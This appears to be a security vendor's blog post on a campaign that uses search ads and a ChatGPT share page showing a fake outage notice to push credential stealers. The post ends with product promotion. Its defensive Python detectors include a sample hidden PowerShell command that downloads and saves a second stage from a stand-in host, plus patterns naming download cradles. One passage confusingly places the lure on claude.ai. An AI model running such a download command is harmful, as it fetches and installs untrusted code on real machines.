
A recently discovered campaign shows how attackers abuse ChatGPT’s sharing feature and search ads to spread malware. By bidding on search terms like “ChatGPT,” they push malicious ads that link to a shared ChatGPT page on chatgpt.com. Instead of a chat, this page displays a convincing “high traffic” outage message instructing users to download a desktop app.
Unaware of the ruse, victims click through and are led to a fake download portal that installs malware. The result is a stealthy delivery of credential stealers and data harvesters through a trusted domain. The following sections break down each step of this scheme and its broader implications.
Attack Chain: From Google Ads to Malware
The attackers use Google Ads to advertise a site that pretends to be the official ChatGPT website. A sponsored link for “ChatGPT” sends the victim to a malicious shared page rather than to the actual ChatGPT service: clicking the ad takes the visitor to a chatgpt.com/s/… share URL created by the fraudster.
- Malicious Ad: Hackers pay for keywords associated with ChatGPT to have their ads show up higher in search results. These ads pretend to direct the victim to the actual ChatGPT site.
- Fake Outage Page: The shared URL at chatgpt.com opens a page informing the user of an outage due to “high traffic.” In addition, the victim is urged to install a desktop app (more on that below).
- Redirect to Download: Clicking the “Download” button sends the victim to openew.app, another malicious ChatGPT clone.
- Hidden Malware: At openew.app, the victim is offered installers for Mac and Windows that silently infect the computer with malicious code (a credential stealer/info-stealer).
The Google ad and the chatgpt.com domain make the setup appear legitimate, while the final downloads deliver the malware.
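The lure-then-download sequence described above can be spotted in web-proxy logs: a client views a chatgpt.com share page and, shortly afterwards, fetches an installer from a host that is not expected to serve software. The following detector is an added example, not code from the campaign write-up or from Xcitium; it assumes a simple space-separated proxy log format (timestamp, client, method, URL, status), a 5-minute correlation window, and an allowlist of hosts that may legitimately serve installers.

```python
import re
from datetime import datetime
from urllib.parse import urlparse

# Constructed web-proxy log lines (timestamp client method url status); not real traffic.
PROXY_LOG = """\
2026-03-02T10:14:01 10.0.0.12 GET https://www.google.com/search?q=chatgpt 200
2026-03-02T10:14:05 10.0.0.12 GET https://chatgpt.com/s/t_abc123 200
2026-03-02T10:14:19 10.0.0.12 GET https://downloads.example/ChatGPT-Setup.exe 200
2026-03-02T10:20:40 10.0.0.33 GET https://chatgpt.com/s/t_def456 200
2026-03-02T10:31:10 10.0.0.33 GET https://cdn.example/report.pdf 200
2026-03-02T11:02:00 10.0.0.51 GET https://chatgpt.com/s/t_ghi789 200
2026-03-02T11:02:09 10.0.0.51 GET https://updates.corp.example/ChatGPT-Setup.msi 200
"""

# Assumed allowlist of hosts that may legitimately serve installers to this fleet.
ALLOWLIST = {"chatgpt.com", "openai.com", "updates.corp.example"}
INSTALLER_RE = re.compile(r"\.(exe|msi|dmg|pkg)$", re.I)

def is_share_page(url):
    """True for a ChatGPT share link of the form https://chatgpt.com/s/..."""
    u = urlparse(url)
    return u.hostname == "chatgpt.com" and u.path.startswith("/s/")

def find_share_to_download_chains(log_text, window_s=300, allowlist=ALLOWLIST):
    """Flag clients that fetch an installer from an unlisted host within
    window_s seconds of viewing a chatgpt.com share page."""
    last_share = {}  # client -> (timestamp, share url) of the most recent share view
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_text, client, _method, url, _status = line.split()
        ts = datetime.fromisoformat(ts_text)
        if is_share_page(url):
            last_share[client] = (ts, url)
            continue
        u = urlparse(url)
        if INSTALLER_RE.search(u.path) and u.hostname not in allowlist:
            share = last_share.get(client)
            if share and 0 <= (ts - share[0]).total_seconds() <= window_s:
                findings.append({"client": client, "share": share[1], "download": url,
                                 "seconds_after_share": (ts - share[0]).total_seconds()})
    return findings
```

Only the first client trips the rule: the second downloads a PDF, not an installer, and the third fetches its installer from an allowlisted host.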
Fake ChatGPT Outage Notice Tricks Victims
When users land on the shared ChatGPT page, they see a well-crafted message about the supposed situation. It says, “We’re experiencing high traffic right now… our website is temporarily unavailable due to a large number of users. Download our desktop app to continue”. The page follows ChatGPT’s branding and even carries links like “Show code / Remix with ChatGPT”, which reveal that it is HTML written by a user rather than a real chat.
In practice, most visitors only see what looks like an ordinary ChatGPT page carrying this message, so it passes as official. The urgent “high traffic” wording pushes the user to download the application without a second thought.
Impersonated ChatGPT Download Site Delivers Malware
When the user clicks the download button, they are redirected to the openew.app website. It is designed to resemble the official ChatGPT site: an OpenAI logo, a short description, and download links for both macOS and Windows. Because .app is a Google-run top-level domain that requires HTTPS, openew.app shows a padlock icon in every browser.
Unfortunately for users, both downloads contain malware. The site is also cloaked from automated scanners such as URLScan: when a bot visits openew.app, it is redirected to a seemingly legitimate website describing an AR/VR company, while ordinary users see the fake ChatGPT page with the malicious download links. The website offers two downloadable items:
- Windows Installer: The installer launches a hidden PowerShell session that downloads and executes the malware. Analysis of the script used in this step showed that it runs PowerShell with an unrestricted execution policy and then downloads a credential stealer.
- macOS Installer: This download is a disk image called Odyssey Stealer, which is actually a variant of the infamous AMOS malware. It quietly harvests cookies, login credentials and crypto wallet data from infected machines.
By splitting targets by operating system, the attackers maximize impact. In tests, both installers attempted to install malware payloads rather than any legitimate ChatGPT app.
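The Windows branch above (an installer spawning a hidden PowerShell session with an unrestricted execution policy that downloads a second stage) is a pattern an endpoint team can hunt for in process-creation telemetry. This classifier is an added example, not code from the campaign write-up or from Xcitium; it assumes Sysmon-style records with a parent image path and a command line, constructed inline, and scores three command-line indicators plus one parent-path indicator.

```python
import re

# Constructed Sysmon-style process-creation records (not from the campaign).
EVENTS = [
    {"pid": 4120,
     "parent": r"C:\Users\alice\Downloads\ChatGPT-Setup.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Unrestricted '
                '-Command "Invoke-WebRequest -Uri https://dl.example/stage2 -OutFile $env:TEMP\\s2.exe"'},
    {"pid": 4188,
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service"'},
    {"pid": 4201,
     "parent": r"C:\Program Files\Deploy\agent.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1'},
]

# Command-line indicators. PowerShell flags are case-insensitive and accept unique
# prefixes (-w for -WindowStyle, -ep/-ex for -ExecutionPolicy), so match loosely.
INDICATORS = {
    "hidden_window":   re.compile(r"-w[a-z]*\s+hidden", re.I),
    "lax_policy":      re.compile(r"-e[a-z]*\s+(unrestricted|bypass)", re.I),
    "download_cradle": re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|net\.webclient",
        re.I),
}
# A PowerShell parent living in a user-writable folder (a freshly downloaded installer).
USER_WRITABLE_PARENT = re.compile(r"\\(downloads|temp|appdata)\\", re.I)
CORE = {"hidden_window", "lax_policy", "download_cradle"}

def classify(event):
    """Return (severity, matched indicators) for one process-creation event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    if USER_WRITABLE_PARENT.search(event["parent"]):
        hits.append("parent_in_user_writable_path")
    if CORE.issubset(hits):
        return "high", hits          # the full hidden + lax policy + download chain
    if len(hits) >= 2:
        return "medium", hits        # partial chain, worth a look
    return "none", hits

def scan(events):
    """Return (pid, severity, indicators) for every event that is not benign."""
    results = []
    for event in events:
        severity, hits = classify(event)
        if severity != "none":
            results.append((event["pid"], severity, hits))
    return results
```

A single lax execution policy (the third record, a deployment agent running a signed script) stays below the alert threshold, while the installer-spawned hidden download session scores high.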
Why Trusted AI Platforms Are Easy Targets
The campaign’s success depends heavily on how much users trust the platform involved. The ChatGPT share link and the openew.app website look trustworthy both to users and to their security software. The lure page sits on chatgpt.com and claude.ai, domains users trust; because of their reputation the pages are deemed benign, and security filters wave the fake page through. Even users who check the address bar see “chatgpt.com” and assume it is safe.
This approach matches current trends in malware distribution: more than 60% of attacks were delivered via online ads in 2025, making programmatic ads and search results major channels for attack delivery. By abusing ChatGPT’s sharing system, cybercriminals piggyback on a trusted website.
Examples of Similar AI-Powered Scams
This is not an isolated case. Attackers have repeatedly abused AI chat websites and other reputable sites. According to reports from early 2026, attackers used Google Ads to redirect users to a shared Claude.ai chat that asked them to download files; the chat also contained command-line instructions, which users were told to copy and paste, that installed malware.
More than 700 sites were compromised through a CMS vulnerability and made to redirect visitors to a bogus verification step that had them run malware-installing commands. Other attacks used the sharing features of ChatGPT and Grok to pass off malware command-line instructions as software installation guides.
Security teams and end users should recognize that criminals will exploit the trust placed in sites such as AI services and cloud platforms to launch malware campaigns. Such attacks will keep coming for as long as attackers have avenues like this one. That AI platforms are being targeted should surprise no one.
Conclusion: When Trusted AI Links Become Malware Delivery
This campaign shows how attackers are turning trusted AI platforms into malware launchpads. The victim does not start on a suspicious domain. They click a search ad, land on a real ChatGPT share link, see a convincing outage message, then follow a fake download path that delivers credential stealers and macOS malware.
The attack succeeds because trust is borrowed from platforms users already believe are safe.
Why This Threat Works So Well
AI sharing links, search ads, and polished fake download pages create a dangerous chain of deception:
- Sponsored search results push malicious links above legitimate ones
- ChatGPT share pages make the lure appear trusted
- Fake outage messages create urgency and reduce skepticism
- Cloaked download sites evade automated scanners
- Windows and macOS payloads maximize impact across users
- Credential stealers target cookies, logins, wallets, and browser data
Once the user follows the trusted path, the attacker controls the outcome.
Where Xcitium Changes the Outcome
For organizations using Xcitium’s layered security approach, this attack would be disrupted at multiple stages.
Xcitium Cyber Awareness Education helps users recognize the warning signs of AI-themed scams, malicious search advertisements, fake outage notifications, and deceptive download pages before they interact with them.
Xcitium Phishing Simulation enables organizations to continuously test and reinforce user resilience against evolving social engineering tactics, helping security teams identify high-risk users and improve awareness before real attacks occur.
If a user still proceeds with the download, Xcitium Advanced EDR provides the final line of defense:
- Unknown installers are isolated the moment they execute
- Hidden PowerShell chains cannot freely launch malware
- macOS stealer payloads cannot access real user data
- Code can run without being able to cause damage
- Credential theft, persistence, and data harvesting are stopped before impact
Even when attackers abuse trusted AI platforms and legitimate-looking content, users are better prepared to recognize the deception, and any malicious payload that reaches the endpoint is prevented from causing harm.
Stop Malware Where Trust Is Abused
Attackers now weaponize search engines, AI sharing platforms, and familiar user experiences to make malicious downloads appear legitimate. Effective defense requires both user education and execution-level protection.
With Xcitium Cyber Awareness Training, Phishing Simulation, and Advanced EDR, organizations can reduce the likelihood of users falling for these attacks while ensuring that malicious payloads remain isolated.